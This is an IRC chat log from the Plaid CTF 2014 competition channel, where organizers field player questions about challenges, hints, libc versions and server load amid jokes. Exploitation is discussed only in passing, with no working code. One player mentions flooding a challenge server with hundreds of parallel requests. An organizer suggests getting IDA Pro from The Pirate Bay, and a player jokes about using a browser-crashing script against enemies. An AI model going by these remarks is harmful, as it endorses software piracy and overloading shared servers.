(17:53:34) jOin: (Galactic) (~Galactic@unaffiliated/galactic)
(17:53:56) (crowell) who can I ping on wheeee?
(17:54:34) (+tylerni7) crowell: me or mserrano but he's not around
(17:54:44) (+tylerni7) heartbleed should be back on port 45373
(17:55:36) (crowell) tylerni7: ok, I was parsing something wrong, nvm
(17:55:40) (+tylerni7) k
(17:58:09) qUit: (lollip) (89ccb77e@gateway/web/freenode/ip.137.204.183.126) Quit: Page closed
(17:58:21) (lkwpeter) who can i pm for doge stege ?
(17:58:26) (+tylerni7) lkwpeter: me
(17:58:39) (+tylerni7) win 114
(17:58:41) (+tylerni7) ugh
(17:59:39) (pipecork) that's a lot of windows
(17:59:43) (shortkidd) inb4 he just gave us an answer
(17:59:55) (+tylerni7) pipecork: yes, -_-
(18:00:13) (Adran) doge 114
(18:01:40) (namrog84) much messages
(18:05:26) (PoopyPantsSr) halphow2js is good at crashing my browser
(18:05:32) (+tylerni7) :P
(18:05:52) (isra17) is it possible get libc binary used for the exploit?
(18:06:19) (+tylerni7) isra17: sorry, no
(18:06:31) (+tylerni7) it's doable without (and people have been solving it without)
(18:06:41) (+tylerni7) we don't plan to change that
(18:07:47) qUit: (rvpersie_) (
[email protected]) Remote host closed the connection
(18:09:05) qUit: (shortkidd) (60279873@gateway/web/freenode/ip.96.39.152.115) Ping timeout: 240 seconds
(18:09:56) jOin: (fixception) (322e9f29@gateway/web/freenode/ip.50.46.159.41)
(18:09:56) mOde: (ChanServ) sets (+v fixception)
(18:10:25) (+tylerni7) yay another rsa solve :)
(18:10:52) (eastwolf_) can I ask a question about rendezvous in pm?
(18:11:14) (+tylerni7) eastwolf_: poke houqp
(18:11:36) (Zoro) How do I view the hint for tiffany?
(18:11:46) (+tylerni7) Zoro: you don't
(18:11:54) (+awesie) there should a hints link at the top of the page
(18:11:56) (+tylerni7) unless maybe chance thing comes up and decides to give a hint
(18:11:56) (Zoro) why is it there?
(18:11:56) (+tylerni7) oh
(18:13:36) (+mserrano) crowell: if you still need wheee questions answered I am here
(18:13:37) (Zoro) wow. that's a great hint. It's about as helpful as hydrofluorosilicic acid.
(18:13:44) (+mserrano) In fact, if anyone needs whee answers they can ask
(18:13:44) (Zoro) it's about as helpful as a flea.
(18:13:52) (+tylerni7) answers?
(18:13:56) (+tylerni7) :P
(18:14:03) (Zoro) May I have the answers?
(18:14:25) (alexwebr) mserrano: What is the vulnerability?
(18:14:31) (alexwebr) mserrano: op plz respond
(18:14:32) (+mserrano) er
(18:14:37) (+mserrano) answers to reasonable questions :P
(18:14:44) (Adran) how do I computer?
(18:15:00) (+mserrano) alexwebr: there is a bug in the crypto.
(18:15:12) (+mserrano) Hope that helps!
(18:15:17) (alexwebr) mserrano: :P
(18:16:06) (asmoday) oh shit we have gone np
(18:16:08) (+mserrano) Dear person who submitted his email as a flag:
(18:16:14) (+mserrano) I don't think your email is a flag.
(18:16:31) (Adran) spam flag
(18:16:35) (asmoday) next we are going to solve p vs np
(18:16:50) ([NULLify]Chaplin) Is WhatsCat sending password reset emails?
(18:16:55) (asmoday) then world peace
(18:17:04) ([CISSP]HoLyVieR) did anyone dare to submit the javascript flag yet ?
(18:17:05) (Adran) [NULLify]Chaplin: it was
(18:17:06) (rray) [NULLify]Chaplin: yes
(18:17:10) ([NULLify]Chaplin) 'Cause I'm not getting one at my 10 minute mail address
(18:17:25) (Kasalehlia) asmoday: dont forget the higgs and neutrino stuff
(18:17:27) (rray) refresh your 10 minute email address
(18:17:29) qUit: (DuhJangOh) (406a2765@gateway/web/cgi-irc/kiwiirc.com/ip.64.106.39.101) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(18:17:53) ([NULLify]Chaplin) rray: I have been.
(18:18:03) (+tylerni7) [NULLify]Chaplin: it should work
(18:18:09) (+tylerni7) might be slow/sent to spam
(18:18:30) ([NULLify]Chaplin) tylerni7: k, I'll give it some more time, maybe try another inbox
(18:19:45) ([NULLify]Chaplin) 10MM didn't work, Mailinator did. Thanks anyways guys
(18:20:12) (+tylerni7) cool
(18:20:13) (ronbarrey) how can multiplication be hard?
(18:20:25) nIck: (Xor0X_pwn100) is now known as (Xor0X)
(18:20:55) jOin: (rliu) (ad3d971b@gateway/web/freenode/ip.173.61.151.27)
(18:20:56) qUit: (Guest24706) (
[email protected]) Read error: Connection reset by peer
(18:21:17) (ktrask) ronbarrey: sometimes the result is not as expected
(18:21:22) (kmowery) is the wheeeee server wedged
(18:21:35) (kmowery) wait, no, it's responding to Some of my requests
(18:21:51) (+mserrano) kmowery: looks fine to me
(18:23:48) (namrog84) arghh, i know what i need to do to get a flag, but i dont know how i do what i need to do. its the worst!
(18:24:03) (+tylerni7) :(
(18:24:36) (ronbarrey) why is the multiplication so hard...
(18:24:37) (paul66) 1700
(18:24:48) (mongo12) dont try to get the flag, thats impossible; try to realize the truth, there is no flag
(18:25:33) (mongo12) oh wait, we're doing hackers references, not matrix
(18:25:35) (Anyny0) The flag is cake.
(18:25:38) (Anyny0) The cake is a lie
(18:25:40) (+mserrano) The flag is a lie.
(18:25:45) ([NULLify]Chaplin) Haha, we're watching Matrix here
(18:25:55) (x_x) So there are no flags and we're all winners?
(18:26:20) (wyatt_earp) ^^^ what kind of "everyone's special" crap is that
(18:29:00) (WhizzMan) Kaiser Sose ate my flag
(18:31:00) (asmoday) I am stealing this browser crashing js and using it as revenge on my enemies
(18:31:21) (Adran) asmoday: it crashed your browser?
(18:31:57) (asmoday) no offense but as the script says...you must not know js
(18:34:56) jOin: (bglAEB) (406a2765@gateway/web/cgi-irc/kiwiirc.com/ip.64.106.39.101)
(18:35:07) (bglAEB) is the flag to multiplication is hard in decimal?
(18:35:23) (asmoday) no
(18:35:23) (+mserrano) once you know what the flag is
(18:35:26) (+mserrano) it is obviously the flag
(18:35:57) (bglAEB) i thought i did know :(
(18:36:01) (asmoday) put XXXXXXXXXXXXXXXXXXXXXXYYYYYYYYYYYYYXXXXXXXXXXXXXXXXXXXXXX in the #1 on the js test for a good time
(18:36:02) (asmoday) hahahah
(18:40:58) (tomcr00se) libc for the pokemon one?
(18:41:07) (+mserrano) tomcr00se: you don't need it
(18:41:09) jOin: (l0l0l) (932e7f69@gateway/web/freenode/ip.147.46.127.105)
(18:41:25) (tomcr00se) ugh
(18:41:50) (+tylerni7) :P
(18:41:51) (tomcr00se) but i'm so lazy
(18:41:51) (+tylerni7) n00b
(18:41:52) (LMolr) hint crypto 200
(18:41:54) (LMolr) plox
(18:42:02) (LMolr) hint crypto 20
(18:43:02) qUit: (Anyny0) (6babd56d@gateway/web/cgi-irc/kiwiirc.com/ip.107.171.213.109) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(18:43:46) jOin: (okik) (89ccb77e@gateway/web/freenode/ip.137.204.183.126)
(18:43:58) (okik) Any hints for nightmares?
(18:44:15) (okik) plzplz
(18:44:26) (+mserrano) there's some python shit
(18:44:30) (+mserrano) and it will haunt your nightmares
(18:44:48) (crowell) writin' ruby jail next year
(18:44:54) (+mserrano) lol
(18:45:05) (crowell) fuck yo python
(18:45:09) (iago-x86) Not sure if you can say, but is the heap executable on kappa?
(18:45:10) (okik) doesn't pyjail approach work?
(18:45:14) (+mserrano) iago-x86: it is not
(18:45:18) (iago-x86) damnit
(18:45:24) (iago-x86) I didn't think so, but wanted to confirm
(18:45:27) (+mserrano) okik: why not try it?
(18:45:47) (+mserrano) iago-x86: you can always run checksec.sh, btw
(18:46:12) (+mserrano) http://www.trapkit.de/tools/checksec.html
(18:46:19) (iago-x86) mserrano: Nice, I didn't know about that!
(18:46:28) (iago-x86) Sadly, on my box it runs on the heap
(18:46:32) (iago-x86) Guess it's not enforcing that
(18:46:38) (iago-x86) Ohwell, EIP control anyway. :D
(18:46:39) (+mserrano) huh. weird.
(18:46:44) (+mserrano) :)
(18:47:13) (+mserrano) I think aslr is on too
(18:47:19) jOin: (vap0r) (d06bcefc@gateway/web/freenode/ip.208.107.206.252)
(18:47:25) supersat stab stab stab
(18:47:39) (+mserrano) also, everyone should vote 5
(18:48:00) (crowell) which one gets frozencemetery problem?
(18:49:29) (+clockish) crowell: misc 250 I think
(18:49:35) qUit: (haoz) (b44ac723@gateway/web/freenode/ip.180.74.199.35) Ping timeout: 240 seconds
(18:49:48) nIck: (nullProtectorate) is now known as (chrissing)
(18:50:11) (+clockish) ...amd it's gone :P
(18:50:29) jOin: (haoz) (b44ac723@gateway/web/freenode/ip.180.74.199.35)
(18:50:37) (tomcr00se) omg tyler wheres your libc finder
(18:50:40) (+clockish) (it needs to be tested by frozen before it can go live)
(18:50:54) jOin: (irctc268) (329c7efb@gateway/web/freenode/ip.50.156.126.251)
(18:50:58) (+clockish) tomcr00se: hack by hand
(18:51:03) (+clockish) be more 1337
(18:51:24) (irctc268) Can someone give hint for g++ reversing 200?
(18:51:32) (+clockish) tomcr00se: also is halphow2js slightly broken or something, how are you the only solver?
(18:51:50) (inter) cuz everyone is doing something else?
(18:51:57) (+clockish) irctc268: strategy: 1. simplify 2. analyze 3. get flag.
(18:52:19) (+clockish) inter: Everyone? there are a lot of you guys...
(18:53:24) (tomcr00se) wtf wtf ezhp has differnt libc?
(18:53:48) qUit: (okik) (89ccb77e@gateway/web/freenode/ip.137.204.183.126) Quit: Page closed
(18:54:00) (+clockish) it's all AWS debain, except for the AWS ubuntus and AWS fedoras.
(18:54:01) (Luffy) i have an announcement to make....
(18:54:29) tomcr00se is not amused
(18:55:05) (_blasty_) clockish: lol
(18:55:37) (kmowery) did other people need multiple machines to solve wheee, or am i missing something important
(18:56:03) (tomcr00se) kmowery: i got 2**24 machines to do it
(18:56:08) (tomcr00se) was fast
(18:56:11) (+mserrano) kmowery: It takes one machine.
(18:57:04) (kmowery) hmmm okay, back to math. thanks!
(18:58:18) * Disconnected
Session Close: Sat Apr 12 18:58:19 2014
Session Start: Sat Apr 12 18:58:19 2014
Session Ident: #pctf
(18:58:27) rAw (0) LS account-notify extended-join identify-msg multi-prefix sasl
(18:58:27) nIckname in use: (x_x)
(18:58:27) iNfo: Press Control+F1 to retry taking the nick (x_x)!
(18:58:27) rAw (0) ACK multi-prefix
(18:58:27) rAw (432) -_- Erroneous Nickname
(18:59:08) * Attempting to rejoin channel #pctf
(18:59:12)
(18:59:12) jOined: (#pctf)
(18:59:12)
(18:59:12) tOpic: ([Plaid CTF 2014 - play.plaidctf.com] 24 Hours left | $20 added to each cash prizes so far (from CHANCE card))
(18:59:12) sEt by: (cai_!~cai_@2001:19f0:1604:3ede:250:56ff:feae:66de) on (Saturday, April 12th 2014, 16:41:38)
(18:59:12) uSers: 407 users, 1 ops (0%), 12 voiced (3%), 394 regulars (97%)
(18:59:12) sYnc time: (0.61) second(s)
(18:59:12)
(18:59:12) -asimov.freenode.net@#pctf- [freenode-info] channel trolls and no channel staff around to help? please check with freenode support: http://freenode.net/faq.shtml#gettinghelp
(18:59:17) (Yerer) Wow looking at the flashing colors one made me feel a little nauseous haha
(18:59:26) (haoz) can i have any direction for stege
(18:59:31) (Luffy) think how me, a colorblind person, feels
(18:59:32) (|x_x|) Yeah, it's an epillepsy warning.
(18:59:35) (haoz) *stege_doge
(18:59:35) (+tylerni7) Yerer: disable javascript I guess
(18:59:38) (|x_x|) Nearly put me out looking at the page.
(18:59:47) (+tylerni7) I /did/ slow it down a bit
(18:59:52) (Yerer) Haha no it's okay I got it turned off
(18:59:57) (+tylerni7) :P
(19:00:09) (|x_x|) I didn't see the warning at first and it almost floored me.
(19:00:11) (ronbarrey) any hints for the crypto20
(19:00:13) (deject3d) tomcr00se would you adopt me
(19:00:15) |x_x| knows you guys were trying to kill him.
(19:00:50) (supersat) wtf, no hex numbers in json?
(19:00:54) (corpille) thanks for mtpox hint ....
(19:00:54) (+mserrano) |x_x|: :(
(19:00:55) (+mserrano) sorry
(19:00:59) (tomcr00se) deject3d: do you know which libc is on the pokemon machine?
(19:01:16) (+mserrano) lol all our hints are from ages ago
(19:01:19) (+mserrano) maybe we should put in new hints
(19:01:24) (_blasty_) no
(19:01:26) (_blasty_) fuck hints
(19:01:31) (deject3d) 2.18
(19:01:32) (|x_x|) It's alright, mserrano. Could have been much worse had I been alone at the time.
(19:01:32) (_blasty_) esp for tasks that have been solved
(19:01:50) (_blasty_) also fuck breakthrough pts
(19:01:51) (Zoro) Home Alone
(19:02:00) (_blasty_) its BS, and everyone knows it :P
(19:02:07) ([NULLify]Chaplin) Is there a special admin account for WhatsCat?
(19:02:25) (Zoro) What does "Chronosphere discharge in 3 minutes" mean?
(19:02:27) (Zoro) New hint?
(19:02:41) (deject3d) it means pucker your butthole ChanServ
(19:02:45) (+mserrano) Zoro: new problem
(19:02:50) ([NULLify]Chaplin) deject3d: lulz
(19:02:54) (+mserrano) we may release an additional new problem soon (tm)
(19:02:56) (deject3d) cha<tab>
(19:02:56) (+mserrano) but no promises
(19:03:15) (asmoday) too bad those hints should be damn obvious or your out of your element
(19:03:15) (bglAEB) how do we see the hint for mtpox
(19:03:19) qUit: (deject3d) (
[email protected]) Quit: Computer has gone to sleep.
(19:03:22) (+clockish) [NULLify]Chaplin]: tylerni7 or I can whatscat
(19:03:22) (asmoday) click hints
(19:03:23) (Luffy) release the cracken!
(19:03:24) (jduck) lol "new hint for mtpox"
(19:03:28) (+clockish) bglAEB: on the hints page
(19:03:33) (+mserrano) jduck: it randomly picked a hint from the db
(19:03:34) (Luffy) wait
(19:03:37) (Luffy) wheres the hints page
(19:03:41) (+mserrano) when we saw it was that one we were like "well, that's unfortunate"
(19:03:44) (Luffy) oh nvm
(19:03:45) (Zoro) Luffy: Up at the top
(19:03:56) (jduck) wel i guess it makes sense as long as there is at least one team that hasn't solved =)
(19:04:27) (Luffy) omg
(19:04:30) (Luffy) that hint for mtpox
(19:04:30) (Zoro) I would rather accept a hint of spice than these hints
(19:04:35) (Luffy) i already got that far with it
(19:04:36) (Luffy) lol
(19:05:55) (|x_x|) he who controls the spice controls the universe!
(19:06:03) (+mserrano) hm wtf website bug
(19:06:05) +mserrano tries to fix
(19:06:06) (vap0r) ...that's supposed to be a hint? :P
(19:06:15) (chrissing) wait does pwn150 open up?
(19:06:22) (_blasty_) pwn150
(19:06:25) (_blasty_) no click
(19:06:30) (_blasty_) is this scoreboard challenge ?
(19:06:45) (bglAEB) what's up with multiplication is hard
(19:06:47) (_blasty_) first team to make json req for chall info gets a headstart
(19:06:51) (bglAEB) that's the one that needs a god damned hint
(19:06:52) (asmoday) whats the string for tiffany
(19:07:01) (+mserrano) harry_potter open
(19:07:04) (_blasty_) ah now it works
(19:07:09) (+mserrano) sorry
(19:07:11) (+mserrano) was glitchy
(19:07:20) (+mserrano) it opened a problem we deleted (because it broke and we do not have time to fix it)
(19:07:26) (+mserrano) but displayed this problem as being opene
(19:07:27) (+mserrano) open*
(19:07:45) (Redford) mserrano: WHEEE is lagging :( is was muuuch faster an hour ago
(19:08:05) (+mserrano) Redford: hm let me poke it
(19:08:18) (Ymgve) wtf is up with the markup on harry_potter
(19:08:37) (Redford) I have to wait a couple of minutes for each encryption
(19:08:42) (+mserrano) Redford: oh god someone is nuking it
(19:08:43) (+mserrano) wtf people
(19:08:59) (Redford) :/
(19:09:11) (+mserrano) someone made like
(19:09:15) (+mserrano) 400 parallel requests to it
(19:09:18) (Redford) omg
(19:09:20) (Redford) :O
(19:09:21) (+mserrano) like that will not do what you want
(19:09:22) (+mserrano) lol
(19:09:24) nIck: (oej) is now known as (_joeje_)
(19:09:31) qUit: (hammerpig) (~user@gateway/tor-sasl/hammerpig) Quit: leaving
(19:09:38) +mserrano about to killall
(19:09:45) (+mserrano) ... once killall finishes installing
(19:09:49) (+mserrano) the cpu got wrecked
(19:10:39) (+mserrano) Redford: check now
(19:10:49) (+mserrano) I killed like ~4000 instances
(19:10:53) (Redford) wow
(19:10:55) (Redford) thx!
(19:10:57) (namrog84) dogeeee
(19:11:05) (+mserrano) I guess someone pointed like a botnet at it or something
(19:11:05) (+mserrano) lol
(19:11:32) qUit: (paul66) (
[email protected]) Read error: Connection reset by peer
(19:12:29) (kmowery) that might have been me
(19:12:52) (+mserrano) kmowery: ... please don't do that
(19:12:55) (+mserrano) you really don't have to to solve it
(19:13:41) (kmowery) i'm fairly sure i have a solution for it, but i need something like 2^13 blocks enciphered
(19:13:49) qUit: (bglAEB) (406a2765@gateway/web/cgi-irc/kiwiirc.com/ip.64.106.39.101) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(19:13:54) (kmowery) frustrating, but i'll go look for another solution
(19:13:59) (+mserrano) You can do that sequentially instead of making many many requests in parallel, if you must
(19:14:05) qUit: (lstamour_) (18699342@gateway/web/freenode/ip.24.105.147.66) Ping timeout: 240 seconds
(19:14:06) (Luffy) thought id let you all in on this
(19:14:09) (+mserrano) 2^13 is only what, like 8000?
(19:14:10) (Luffy) "mtpox.com is a Bitcoin Phishing Site being advertised on Google Adsense"
(19:14:15) (+mserrano) LOL
(19:14:18) (Redford) mserrano: still slow, but it's better now
(19:14:24) (kmowery) mserrano: it's far too slow; things change before my proof of work works fast enough
(19:14:45) (+mserrano) kmowery: that suggests that maybe there's a better solution
(19:14:47) (+mserrano) Redford: hm
(19:14:50) jOin: (roolky) (1f1821dd@gateway/web/freenode/ip.31.24.33.221)
(19:14:54) (+clockish) kmowery: or that you need to work faster :P
(19:15:13) (Redford) mserrano: still about 5 times slower than previously
(19:15:23) (Redford) but I can deal with it
(19:15:25) (Redford) it works now
(19:15:31) (roolky) any hint for webcats?
(19:15:48) (namrog84) the dogestege, will it be apparent/obvious to me when i solved it correctly? cause i feel like itll be subtle/easy to miss
(19:15:59) (+clockish) namrog84: it will be obvious
(19:16:10) (|x_x|) namrog84, so very obvious.
(19:16:19) (+mserrano) Redford: yeah... it's incredibly heavily cpu-bound
(19:16:35) (+mserrano) Redford: so if more than one person asks at a time it may be slower
(19:16:43) (+mserrano) maybe I can increase the time between key cycles
(19:16:43) (phiber_) they key on wheeee changes too fast
(19:16:57) (phiber_) I can't get enough plaintexts before it changes
(19:17:27) (Adran) very obvious
(19:17:28) (Adran) mcuh wow
(19:17:47) (Redford) mserrano: maybe you could run it using pypy instead of python? it will give you a big speed-up ;)
(19:18:00) (+mserrano) Redford: sadly it won't
(19:18:02) (+tylerni7) Redford: it uses C for the hard parts
(19:18:05) (asmoday) members of more smoked leet chicken, any members of your team goes to defcon look for DC814/DC407 group I Asmoday will buy a beer хорошо
(19:18:07) (+mserrano) it runs in C for the cpu-bound part, yeah
(19:18:21) (inter) honestly
(19:18:25) (Luffy) namrog84: it's obvious to those who have solved it :)
(19:18:31) (inter) why would you guys put 38.55 * 1700
(19:18:37) (inter) the trolling is real
(19:18:43) (+mserrano) inter: because multiplication is hard.
(19:18:49) (asmoday) haha that was a great challenge
(19:18:51) (Luffy) inter: ya inter
(19:19:04) (inter) why not 65535
(19:19:06) (asmoday) the person that made that challenge must have hated life for a time
(19:19:08) (inter) and mess their brain up
(19:19:19) (Redford) mserrano: server down
(19:19:20) (asmoday) I know I did
(19:19:23) (+mserrano) Redford / phiber_: restarting it
(19:19:29) (Redford) ok
(19:19:30) (namrog84) Luffy, thanks. fairly new to forenseics, so poking around a bunch of stuff trying to figure it out, wasnt sure if it would be subtle or not
(19:19:31) (+mserrano) Redford / phiber_: increasing time between cycles
(19:19:40) (phiber_) thank you
(19:19:42) (Redford) thx!
(19:20:28) (+clockish) namrog84: forensics problems often suck. Not that this one doesn't, but there's a reasonably simple thing you can do to produce a very obvious flag :P
(19:20:40) (Zoro) not really
(19:20:46) (asmoday) what is the tiffany string
(19:20:57) (Luffy) namrog84: don't listen to clockish forensics are the best
(19:21:12) (+mserrano) Redford / phiber_: back up
(19:21:14) (+clockish) I HATE FORENSICS
(19:21:21) (Luffy) FORENSICS HATE YOU
(19:21:27) (+clockish) I KNOWWWWW
(19:21:30) (+mserrano) you shouldn't need too many ciphertexts, but yeah, blanked on the fact that more people at a time nuked the cpu
(19:21:32) (Luffy) :)
(19:22:05) (phiber_) thanks, let's see how it goes now
(19:22:35) qUit: (irctc268) (329c7efb@gateway/web/freenode/ip.50.156.126.251) Ping timeout: 240 seconds
(19:24:14) nIck: (Guest76035) is now known as (the_doctor)
(19:24:44) nIck: (the_doctor) is now known as (Guest10433)
(19:25:14) qUit: (albntomat0) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186) Quit: Page closed
(19:25:28) nIck: (Guest10433) is now known as (thedoctordmc)
(19:31:15) (+mserrano) Gj Stratum Auhuur!
(19:31:18) qUit: (roolky) (1f1821dd@gateway/web/freenode/ip.31.24.33.221) Quit: Page closed
(19:31:20) (+mserrano) gcc solved
(19:31:20) (tsuro) mserrano: thanks :)
(19:31:45) (+tylerni7) nice job guys :)
(19:32:03) (tsuro) that challenge is awesome btw^^
(19:32:08) (+mserrano) 1 -> Chance, 2 -> Chance, 3 -> r250, 4 -> pwn200, 5-> forensics 350, 6 -> chance
(19:32:46) (+tylerni7) tsuro: awesie was the creator :)
(19:32:55) (+awesie) tsuro: \o/ thanks :)
(19:33:02) qUit: (LMolr) (89ccb77e@gateway/web/freenode/ip.137.204.183.126) Quit: Page closed
(19:33:54) |x_x| must note that mixing php and asp is a sin against all things of the mortal realm.
(19:34:23) (Kasalehlia) s/mixing//
(19:34:33) (|x_x|) :D
(19:34:57) pArt: (pcc7) (ca780766@gateway/web/freenode/ip.202.120.7.102)
(19:35:11) jOin: (pcc7) (ca780766@gateway/web/freenode/ip.202.120.7.102)
(19:35:36) (pcc7) any help for pyjail?
(19:36:02) (inter) RYAN
(19:36:06) (inter) WHERE ARE YOU RYAN
(19:36:13) (shadghost) HE DIED
(19:36:14) (shadghost) SORRY
(19:36:36) qUit: (chrissing) (
[email protected]) Remote host closed the connection
(19:36:48) (+clockish) pcc7: pyjail is me, feel free to pm
(19:37:36) (inter) clockish: what is worse? pyjail or bashjail
(19:37:52) (|x_x|) alcatraz
(19:38:17) (inter) wow
(19:38:19) (inter) mac doesnt have
(19:38:19) (inter) wget?
(19:38:38) (jmgrosen) what about reekee?
(19:38:51) (jmgrosen) that's really annoying me by this point
(19:39:01) (jmgrosen) any hints from admins? :P
(19:39:07) (+tylerni7) no :P
(19:39:39) (jmgrosen) our best guess by now is that you found a 0day in django
(19:39:51) (+tylerni7) -_-
(19:39:53) (poppopret) where can we get a free version of ida 64-bit?
(19:40:01) (+tylerni7) poppopret: the pirate bay
(19:40:16) ([CISSP]HoLyVieR) I think the demo version could work
(19:40:16) (ryan-c) poppopret: There is no free version, only a warez version.
(19:40:22) (corpille) any better hint on mtpox ?
(19:41:00) (poppopret) i dont think it works for the demo version...it says
(19:41:06) (ryan-c) corpille: The challenge was created by special guest MagicalTux. He's very proud of it.
(19:41:08) (x56) IDA 5.0 is free for windows, IDA 6.0 has a demo
(19:41:09) (poppopret) "please use IDA Pro 64-bit to load 64-bit files"
(19:41:20) (x56) but 64-bit has no demo
(19:41:24) (x56) or free version
(19:41:26) (x56) or anything
(19:41:33) (Adran) ryan-c: lol
(19:41:36) (|x_x|) Warez is bad.
(19:42:16) (ryan-c) also, i hear the salt is 'Bitcoins'
(19:42:29) (+tylerni7) :| it is not
(19:42:43) (|x_x|) mmm salt
(19:42:44) (corpille) ryan-c nice try :p
(19:42:53) (ryan-c) trolololol
(19:44:09) (corpille) so no real hint ?
(19:45:22) (ryan-c) well, I'm just playing in the ctf. I think one of the pctf guys might find me at defcon and pwn me if i give unauthorized hints.
(19:45:43) (+tylerni7) corpille: there aren't any other official hints released for it
(19:45:58) (+tylerni7) if you have specific questions, I might answer them in pm if they don't give too much away
(19:46:02) (_joeje_) who wrote kappa?
(19:46:07) (_joeje_) i have question
(19:46:19) (ryan-c) do you have stairs in your house?
(19:46:20) (+tylerni7) _joeje_: dickoff did
(19:46:48) jOin: (thedoctordmc_) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186)
(19:47:04) (thedoctordmc_) as it turns out, multiplication is much harder than I rememberec.
(19:47:23) (Ymgve) multiplication is just repeated addition
(19:48:05) qUit: (thedoctordmc) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186) Ping timeout: 240 seconds
(19:48:25) jOin: (oclarocque_) (628fd7e4@gateway/web/freenode/ip.98.143.215.228)
(19:51:43) (rliu) anyone else getting a 502 on play.plaidctf.com?
(19:52:05) (hasB4K) i have an error 502 too
(19:52:06) (ebeip90) who to ping about doge?
(19:52:15) (+clockish) ebeip90: me
(19:52:20) (+clockish) hasB4K: refresh a lot
(19:52:26) (+clockish) server occationally gets sad
(19:52:40) (hasB4K) yep it works again :)
(19:53:35) qUit: (thedoctordmc_) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186) Ping timeout: 240 seconds
(19:54:43) qUit: (ccmndhd) (
[email protected]) Quit: This computer has gone to sleep
(19:57:05) qUit: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43) Ping timeout: 240 seconds
(19:59:11) (inter) whos in charge of curlcore?
(19:59:23) (+clockish) inter: me
(19:59:25) (inter) did you really overwrite the return address -.-
(20:00:50) (rliu) what does the "chronosphere discharge in a few seconds" mean
(20:01:04) (+tylerni7) new problem coming out
(20:01:07) (+tylerni7) read teh rulez
(20:01:14) (+tylerni7) :|
(20:03:09) qUit: (deject3d) (
[email protected]) Quit: Computer has gone to sleep.
(20:05:31) jOin: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43)
(20:09:34) (Luffy) ERROR!
(20:10:43) (Luffy) itadakimasu
(20:11:39) (Adran) anyone around I can check the steno with?
(20:11:55) (ebeip90) yeah i can take down your court case
(20:11:57) (ebeip90) love stenography
(20:12:45) (Adran) yeah, my brain is fried. :P
(20:12:50) (Adran) doge doge
(20:12:58) (WuZ) wow
(20:13:08) (WuZ) very ctf
(20:13:15) (WuZ) such stegano
(20:13:15) (+clockish) very flage
(20:13:20) (WuZ) much trouble
(20:13:23) (+clockish) Adran: oh, that's me
(20:13:25) (Adran) no spell
(20:13:52) (inter) i have winpcap
(20:13:54) (inter) but i dont have wireshark
(20:13:56) (inter) what is this magic
(20:14:04) jOin: (zorq) (1f1821dd@gateway/web/freenode/ip.31.24.33.221)
(20:14:26) (zorq) who solved whatcat?
(20:14:36) (bobsteam) noone
(20:14:38) (+tylerni7) zorq: I made the problem
(20:14:42) (+tylerni7) if you have questions you can pm me
(20:14:43) qUit: (rvpersie) (
[email protected]) Remote host closed the connection
(20:15:24) (zorq) ok, anyway it's much more harder than other webs (and got only +100 more)
(20:15:36) (Luffy) i have a question
(20:15:38) (Luffy) how do you do it :)
(20:15:54) (iago-x86) Luffy: carefully
(20:16:08) (Luffy) words from the wise
(20:16:24) (Luffy) why would you call yourself a shakespearean character name
(20:16:30) (Luffy) Iago :(
(20:16:36) (Luffy) shakespeare is stupid
(20:16:47) (iago-x86) You're stupid
(20:16:49) (iago-x86) iago was awesome
(20:16:53) (iago-x86) :)
(20:16:54) (Luffy) iago is gay
(20:16:59) (iago-x86) So am I
(20:17:04) iago-x86 throws down
(20:17:06) (Luffy) ok lets take a vote
(20:17:11) (Luffy) who would rather watch anime
(20:17:14) (Luffy) or read a book
(20:17:22) (Luffy) sorry
(20:17:23) (iago-x86) Man, you're awfully sensitive about this! :)
(20:17:25) (Luffy) read a "play"
(20:17:26) (+tylerni7) depends on the anime and the book, probably
(20:17:31) (Luffy) ok
(20:17:36) (oclarocque_) who's the creator of rendezvous?
(20:17:37) (Luffy) who would rather read othello
(20:17:39) (+clockish) how about watching a play?
(20:17:40) (Luffy) or watch One Piece
(20:17:51) (+mserrano) oclarocque_: houqp
(20:17:55) (+clockish) Shakespeare is meant to be watched on stage, not read!
(20:18:02) (oclarocque_) thanks
(20:18:33) qUit: (SaWsi3gE) (
[email protected]) Remote host closed the connection
(20:18:33) (Luffy) ok
(20:18:41) (Luffy) who would rather watch Othello on a stage
(20:18:43) (ebeip90) clockish: pretty sure Shakespeare is meant to be filmed under the direction of Joss Whedon
(20:18:47) (|x_x|) I'm hungry. Someone order me a pizza. Thank you.
(20:18:47) (Luffy) or watch One Piece on their computer
(20:18:58) (+clockish) ebeip90: Heh, I missed that one, was it any good?
(20:19:05) (ebeip90) Much Ado was surprisingly good
(20:19:14) +clockish adds it to his list
(20:19:44) (livinded) what infrastructure does plaidctf run on?
(20:19:49) (|x_x|) ECW
(20:19:54) (WuZ) HAL 9000
(20:19:55) (+mserrano) Much Ado was very good
(20:20:01) (+tylerni7) livinded: EC2
(20:20:03) (|x_x|) I'm afraid I can't allow you to do that, WuZ.
(20:20:11) (WuZ) :(
(20:20:12) (+mserrano) I'm afraid I can't do that, Dave.
(20:20:19) (WuZ) you suffer?
(20:20:23) (|x_x|) Always suffer.
(20:20:26) (Luffy) Othello or One Piece place your votes!
(20:20:38) (livinded) tylerni7: can you bump up the instance types or throw an elb in front of a few for the webs. They are crawling
(20:20:43) (|x_x|) My votes go to the Straw Hats performing Othella.
(20:20:43) (+tylerni7) livinded: django... gunicorn.. memcached... nginx... cai_ and awesie were the only ones brave enough to set it up
(20:20:52) (Luffy) ban his ass please
(20:20:52) (+tylerni7) livinded: which ones
(20:20:52) (Zoro) It's multiple choice guys
(20:20:58) (Zoro) my goodness
(20:20:59) (|x_x|) And I made my own choice!
(20:21:03) (livinded) mtpox
(20:21:05) (Zoro) you sir
(20:21:09) (livinded) and the boards
(20:21:12) (livinded) board*
(20:21:24) (+tylerni7) those seem fine from here...
(20:21:32) (+clockish) the board occationally 502s, but it's generally fine now.
(20:21:41) (+clockish) we can give mtpox a nudge
(20:21:42) (+tylerni7) in fact, mtpox loads faster than mtgox does, for me
(20:21:59) (rray) tylerni7: that's not saying much
(20:22:04) (+tylerni7) :P
